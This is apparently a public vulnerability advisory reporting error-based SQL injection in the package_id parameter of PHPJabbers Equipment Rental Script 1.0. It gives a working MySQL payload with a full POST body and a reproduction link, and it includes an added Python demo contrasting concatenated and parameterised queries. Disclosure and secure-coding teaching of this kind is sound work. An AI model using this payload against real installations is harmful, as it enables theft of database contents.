## Title: Equipment Rental Script-1.0 - SQLi
## Author: nu11secur1ty
## Date: 09/12/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The package_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the package_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The attacker can steal all information from the database!

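The behaviour the description relies on, shown as an added example that is not part of this advisory or of the PHPJabbers product: a package_id lookup that concatenates the request value into the query, so that a lone ' produces the database error the scanner observed, beside a hardened lookup that validates the value as a positive integer and binds it as a parameter. Python with an in-memory SQLite table stands in for PHP and MySQL; the table name, column names and row contents are assumptions constructed for the demo.

```python
import re
import sqlite3

# Constructed demo schema standing in for the rental script's package table.
# Table, columns and rows are assumptions for this example, not the product's schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE packages (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany(
        "INSERT INTO packages VALUES (?, ?, ?)",
        [(1, "Excavator day rate", 450.0), (2, "Scaffold week rate", 900.0)],
    )
    return conn


def lookup_vulnerable(conn, package_id):
    # Anti-pattern: the request value is spliced straight into the SQL text.
    # A single quote unbalances the statement and the database error surfaces,
    # which is exactly the signal the advisory's scanner reported.
    sql = "SELECT id, name, price FROM packages WHERE id = '" + package_id + "'"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, package_id):
    # Step 1: package_id is an integer key, so reject anything that is not a
    # positive decimal integer before it gets anywhere near the database.
    if not isinstance(package_id, str) or not re.fullmatch(r"[1-9][0-9]*", package_id):
        raise ValueError("package_id must be a positive integer")
    # Step 2: bind the value as a query parameter; the driver sends it as data,
    # never as SQL, so quotes and keywords in the input have no effect.
    sql = "SELECT id, name, price FROM packages WHERE id = ?"
    return conn.execute(sql, (int(package_id),)).fetchall()


def probe(fn, package_id):
    """Run one lookup against a fresh database and classify the outcome so the
    two implementations can be compared on the same inputs:
    ('ok', rows), ('db_error', message) or ('rejected', message)."""
    conn = make_db()
    try:
        return ("ok", fn(conn, package_id))
    except sqlite3.Error as e:
        return ("db_error", str(e))
    except ValueError as e:
        return ("rejected", str(e))


if __name__ == "__main__":
    for value in ("1", "'", "-4488))) OR 1"):
        print("vulnerable", repr(value), "->", probe(lookup_vulnerable, value)[0])
        print("hardened  ", repr(value), "->", probe(lookup_hardened, value)[0])
```

The point to take from the probe output is that the hardened path never lets the database see malformed input at all: the scanner's single-quote probe and the advisory's error-based payload are both refused at the validation step, and a legitimate id is served through a bound parameter. Even without the integer check, the parameterised query alone would treat the payload as an opaque string; the validation is defence in depth and gives the application a clean error to log instead of a database stack trace.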
[+]Payload:

```mysql
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: package_id=(-4488))) OR 1 GROUP BY CONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0 END)),0x7176717671,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00
```

## Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
home page: https://www.nu11secur1ty.com/